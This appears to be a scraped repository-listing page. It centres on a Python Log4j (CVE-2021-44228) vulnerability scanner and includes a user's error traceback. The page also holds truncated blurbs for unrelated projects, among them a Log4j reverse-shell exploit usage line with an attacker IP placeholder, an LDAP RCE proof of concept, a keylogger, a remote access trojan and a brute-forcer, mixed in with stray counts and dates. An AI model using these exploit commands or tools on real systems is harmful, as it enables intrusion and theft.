Scanning for CVE-2021-44228, CVE-2021-45046, CVE-2019-17571
Requires a minimum of Python 2.7. Can be executed as Custom Script Rule of an Audit or via a Server Script with Server Automation. Also executable standalone from the command line if an Agent is present.
Reference
log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari
Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne
log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script
log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk
log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be
Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them
Windows 11 python -m pip install pywin32 Python 3.10.1
Thanks, first, for offering this script.
Get the following error when running your script.
5 Sep 12, 2022
6 Dec 28, 2022
60 Dec 10, 2022
1 Dec 15, 2021
431 Dec 22, 2022
144 Nov 19, 2022
91 Dec 29, 2022
16 Mar 24, 2022
13 Jan 4, 2022
c:\dev\github\log4j_scanner>python scanner_win.py
Indicator for vulnerable component found in C:\$RECYCLE.BIN\S-1-5-21-67875770-1077041941-3688728843-1001\$RTYFQH1.jar: log4j 2.9.1-2.10.0
Unhandled exception processing C:\Program Files\Cryptomator\app\mods\javafx-graphics-17.0.1-win.jar
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 88, in main
if handleJar(filename, filename):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 72, in handleJar
return handleJar(io.BytesIO(z.read(name)), filename.decode('utf-8')+":"+name)
AttributeError: 'str' object has no attribute 'decode'. Did you mean: 'encode'?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "c:\dev\github\log4j_scanner\scanner_win.py", line 96, in <module>
sys.exit(main())
File "c:\dev\github\log4j_scanner\scanner_win.py", line 92, in main
traceback.print_exc()
NameError: name 'traceback' is not defined
Any idea why this is causing an issue.
bugAdded checksums for CVE-2021-44832
Source code(tar.gz)Python 3 compatible Use all but 2 CPUs for digest computations.
Source code(tar.gz)Some windows boxes throw an exception calling cpu_count()
Source code(tar.gz)Every project has to have an initial stable release
Source code(tar.gz)Thug The number of client-side attacks has grown significantly in the past few years shifting focus on poorly protected vulnerable clients. Just as th
Discord-keylogger Usage python dlogger.py -t [Time interval in sec] if not speci
HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.
CVE-2021-21985 CVE-2021-21985 EXP 本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。 0x01 利用Tomcat RMI RCE 1. VPS启动JNDI监听 1099 端口 rmi需要bypass高版本jdk java -jar JNDIIn
About: Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux an
Venom Collection Of Discord Hacking Tools / Fun Stuff / Exploits That Is Completely Made Using Python. Report Bug · Request Feature Contributing Well,
TLaunch: Launch Programs on Multiple Hosts Introduction Deepmind launchpad is a library that helps writing distributed program in a simple way. But cu
licence_software_test_app Make sure you set your database values in a .env file to the folder. Install MYSQL connector: pip install mysql-connector-py
getlevels A small Python Script To get all levels of subdomains Easily get 1st level, 2nd level, 3rd level, 4th level .... nth level subdomains Usag
CVE-2021-3625 This repository contains a few example exploits for CVE-2021-3625. All Zephyr-based usb devices up to (and including) version 2.5.0 suff
GoodHound ______ ____ __ __ / ____/___ ____ ____/ / / / /___ __ ______ ____/ / / / __/ __ \/ __ \/ __
Open-source jailbreaking tool for many iOS devices *Read disclaimer before using this software. checkm8 permanent unpatchable bootrom exploit for hund
CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la
CVE-2021-43798 – Grafana Exploit About This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798
Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script
Password Manager is a simple Python project which helps users in managing their passwords in a easier way
CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS
trustme: #1 quality TLS certs while you wait You wrote a cool network client or server. It encrypts connections using TLS. Your test suite needs to ma
Brute-Force-Connected Guess the password for Connected accounts the use : Create a new file and put usernames and passwords in it Example : joker:1234
CVE-2021-26855 PoC for CVE-2021-26855 -Just a checker- Usage python3 CVE-2021-26855.py -u https://mail.example.com -c example.burpcollaborator.net # C
896 Dec 19, 2022
1 Jan 30, 2022
5 May 10, 2022
355 Aug 03, 2022
861 Feb 18, 2021
25 Dec 06, 2022
11 Nov 11, 2022
1 Oct 28, 2021
9 Feb 15, 2022
7 Nov 10, 2022
352 Jan 02, 2023
6.7k Jan 05, 2023
20 Aug 25, 2022
12 Nov 18, 2022
29 Nov 20, 2022
4 Sep 29, 2021
47 Nov 09, 2022
479 Dec 27, 2022
4 Jun 05, 2022
17 Dec 22, 2022